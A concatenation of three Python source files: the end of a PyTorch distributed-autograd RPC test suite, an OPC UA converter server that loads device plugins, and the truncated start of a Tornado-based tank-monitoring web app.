worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = get_shutdown_error_regex(dist_utils.TEST_CONFIG.rpc_backend_name)
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.chain_matmul(t1, t2, t3, t4, t5)
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.chain_matmul(t1, t2, t3, t4)
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.chain_matmul(t1, t2, res)
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@staticmethod
def _set_backward_done():
DistAutogradTest._backward_done = True
@staticmethod
def _wait_backward_done():
while not DistAutogradTest._backward_done:
time.sleep(0.1)
@dist_init(clean_shutdown=False)
@unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/35099")
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(timedelta(milliseconds=5000))
initialize_pg(self.init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = get_shutdown_error_regex(dist_utils.TEST_CONFIG.rpc_backend_name)
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Tell other nodes RPC is done.
for i in range(self.world_size):
if i != self.rank and i != 2:
# Due to non-graceful shutdown of workers, this RPC may not return successfully.
# For example, the destination worker could process the RPC, exit and begin shutdown, and
# shutdown RPC before responding and satisfying this RPC. Therefore, we swallow possible errors here.
try:
rpc.rpc_sync(
"worker{}".format(i),
DistAutogradTest._set_backward_done,
args=(),
)
except Exception as e:
pass
else:
# Wait for backward to finish on rank 0.
DistAutogradTest._wait_backward_done()
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.chain_matmul(t1, t2, t3, t4, res)
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.chain_matmul(t1, t2, t3, t4, res).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
# Need atleast one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
self.assertEqual(0, int(debug_info["local_autograd_engine_cpu_queue_size"]))
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
|
opcua_converter.py
|
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import argparse
BASE_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(os.path.join(BASE_DIR, 'opcua_plugin'))
sys.path.append(os.path.join(BASE_DIR, 'pyutilities'))
# sys.path.append("../opcua_plugin")
# sys.path.append("../pyutilities")
#from logservice.logservice import LogService
from security.config_security import UaSecurity
from storage.config_storage import UaStorage
from logger.ua_logger import UaLogger
import time
import logging
import json
import threading
import datetime
try:
from IPython import embed
except ImportError:
import code
def embed():
vars = globals()
vars.update(locals())
shell = code.InteractiveConsole(vars)
shell.interact()
from opcua import ua, Server
from jsonimporter import JsonImporter
from plugin_adapter import PlugInAdapter
logger = logging.getLogger()
class SubHandler(object):
"""
Subscription Handler. To receive events from plugin
"""
IDLE_WAIT = 1
HEARTBEAT_WAIT = 30
def __init__(self, server, adapter):
self.server = server
self.adapter = adapter
self.plugins = {}
self._thread = None
def loop(self):
delete_list = []
now = datetime.datetime.now()
for name, p in self.plugins.items():
if (now - p.get('last_time')).total_seconds() > self.HEARTBEAT_WAIT:
delete_list.append(name)
for d in delete_list:
self._delete_plugin(d)
def main(self):
while True:
time.sleep(self.IDLE_WAIT)
self.loop()
def run(self):
if not self._thread:
self._thread = threading.Thread(target=self.main, args=())
self._thread.setDaemon(True)
self._thread.start()
def _online(self, plugin_name):
p = self.plugins.get(plugin_name, None)
if not p: # first online.
self.plugins[plugin_name] = {
'node': None,
'last_time': datetime.datetime.now(),
}
else: # second online
node = p.get('node', None)
if not node:
now = datetime.datetime.now()
if (now - p.get('last_time')
).total_seconds() > 1: # maybe third online
plugin_node = None
objects = self.server.get_objects_node().get_children()
for object in objects:
if object.get_display_name().to_string() != "Server":
if plugin_name in object.get_display_name().to_string():
plugin_node = object
break
if not plugin_node:
self.load_rd(plugin_name)
else:
p['node'] = plugin_node
else:
p['last_time'] = datetime.datetime.now()
def _delete_plugin(self, plugin_name):
p = self.plugins.get(plugin_name, None)
if p:
plugin_node = p.get('node', None)
if plugin_node:
self.server.delete_nodes([plugin_node, ], recursive=True)
del self.plugins[plugin_name]
def load_rd(self, plugin_name):
json_in = {'method': 'getrd'}
retcode, json_out = self.adapter.plugin_call(plugin_name, json_in)
if retcode == 0 and json_out:
logger.debug('json_out:' + json.dumps(json_out))
json_data = json.loads(json_out['data'])
file_name = '.plugin_' + plugin_name + '.json'
f = open(file_name, 'wb')
f.write(json.dumps(json_data).encode('utf-8'))
f.close()
# import some nodes from json
importer = JsonImporter(self.server, self.adapter, plugin_name)
importer.import_json(file_name)
else:
logger.error('get resource fail to plugin:' + plugin_name)
def set_value(self, parent, dev_name, var_name, data, it_level=0):
if parent is None:
return
nodes = parent.get_children()
for node in nodes:
if dev_name in node.get_display_name().to_string():
sub_nodes = node.get_children()
for var in sub_nodes:
if var_name == var.get_display_name().to_string():
logger.debug(" Dev Name: " + dev_name)
logger.debug(" Var Name: " + var_name)
logger.debug(" Var Data: " + str(data))
if len(data):
var.set_value(data)
return True
return True
else:
it_level += 1
if it_level > 1 or node.get_node_class() is not ua.NodeClass.Object:
pass
elif self.set_value(node, dev_name, var_name, data, it_level) is True:
return True
return False
def datachange_notification(self, plugin_name, dev_name, var_name, data):
objects = self.server.get_objects_node().get_children()
logger.debug('datachange_notification:')
for object in objects:
if object.get_display_name().to_string() != "Server":
if plugin_name in object.get_display_name().to_string():
logger.debug("New data change Event:")
logger.debug(" Node: " + plugin_name)
self.set_value(object, dev_name, var_name, data)
def event_notification(self, plugin_name, dev_name, event_name, data):
if event_name == 'online':
self._online(plugin_name)
elif event_name == 'exit':
self._delete_plugin(plugin_name)
else:
pass
def ConfigHistoryStorage(server):
uastorage = UaStorage()
dbtype = uastorage.get_storagetype()
if dbtype == 'sqlite':
dbmodule = __import__(
'opcua.server.history_sql',
fromlist=['HistorySQLite'])
server.iserver.history_manager.set_storage(
dbmodule.HistorySQLite(uastorage.get_sqliteconfig()))
elif dbtype == 'mongo':
dbmodule = __import__('history_mongo', fromlist=['HistoryMongo'])
host, port, path = uastorage.get_mongoconfig()
server.iserver.history_manager.set_storage(
dbmodule.HistoryMongo(host, port, path))
def opcua_converter_main(options):
# setup our server
server = Server()
uasecurity = UaSecurity()
if uasecurity.get_securitytype() == 'tls':
server_cert, client_cert, private_key = uasecurity.get_certificates()
if server_cert is None:
logger.error(
'tls is enabled, but server cert is missing with current configuration')
sys.exit(-1)
if private_key is None:
logger.error(
'tls is enabled, but private key is missing with current configuration')
sys.exit(-1)
server.load_certificate(server_cert)
server.load_private_key(private_key)
ConfigHistoryStorage(server)
server.start()
# setup adapter
adapter = PlugInAdapter(options.conf_file)
handler = SubHandler(server, adapter)
handler.run()
adapter.subscription(
handler.datachange_notification,
handler.event_notification)
adapter.start()
try:
while True:
logger.debug('opcua converter running......')
time.sleep(60)
finally:
# close connection, remove subcsriptions, etc
adapter.stop()
server.stop()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='opcua converter arguments')
parser.add_argument(
'-c',
'--conf',
dest='conf_file',
action='store',
default=None,
help='opcua converter configurate file')
parser.add_argument(
'-l',
'--loglevel',
dest='log_level',
action='store',
default=None,
help='log level: critical/error/warning/info/debug')
parser.add_argument(
'-o',
'--output',
dest='output',
action='store',
default=None,
help='log output file with path')
parser.add_argument(
'-s',
'--console',
action="store_true",
help='true is enable to print out log in console')
(options, args) = parser.parse_known_args()
if options.conf_file:
ualogger = UaLogger(logger, options.conf_file)
else:
ualogger = UaLogger(logger)
if options.log_level:
ualogger.set_loggerlevel(options.log_level)
if options.output:
ualogger.set_loggerpath(options.output)
if options.console:
ualogger.enable_console()
ualogger.enable_logger('opcua_converter.log')
# LogService.initialize()
opcua_converter_main(options)
|
tankmonitor.py
|
from threading import Lock, Thread
from tornado.web import Application, RequestHandler, HTTPError
from tornado.httpserver import HTTPServer
from tornado.template import Template
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado.gen import coroutine
from tornado.concurrent import run_on_executor
from sockjs.tornado import SockJSRouter, SockJSConnection
import logging
from tanklogger import TankLogger, TankLogRecord, TankAlert
from functools import partial
from datetime import datetime
from time import time
from serial import Serial
from email.mime.text import MIMEText
from concurrent.futures import ThreadPoolExecutor
import smtplib
import base64
import settings as appconfig
from PIL import Image, ImageDraw, ImageFont
import pcd8544.lcd as lcd
import netifaces as ni
import wiringpi2 as wiringpi
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
listen_port = 4242
disp_contrast_on = 0xB0
disp_contrast_off = 0x80
disp_font = ImageFont.truetype("/usr/share/fonts/truetype/freefont/FreeMonoBold.ttf", 34)
disp_font_sm = ImageFont.truetype("/usr/share/fonts/truetype/freefont/FreeMonoBold.ttf", 9)
BTN_IN = 2 # wiringpi pin ID
BTN_OUT = 3 # wiringpi pin ID
VALVE_GPIO = 6 # wiringpi pin ID
thread_pool = ThreadPoolExecutor(2)
class EventConnection(SockJSConnection):
event_listeners = set()
def on_open(self, request):
self.event_listeners.add(self)
def on_close(self):
self.event_listeners.remove(self)
@classmethod
def notify_all(cls, msg_dict):
import json
for event_listener in EventConnection.event_listeners:
event_listener.send(json.dumps(msg_dict))
class MainPageHandler(RequestHandler):
def get(self, *args, **kwargs):
self.render('main.html')
logger_map = {
'10': 'tensec_logger',
'60': 'minute_logger',
'3600': 'hour_logger'
}
class LogDownloadHandler(RequestHandler):
def get(self, logger_interval):
fmt = self.get_argument('format', 'nvd3') # or tsv
deltas = self.get_argument('deltas', False)
logger = getattr(self.application, logger_map[logger_interval], None)
if logger:
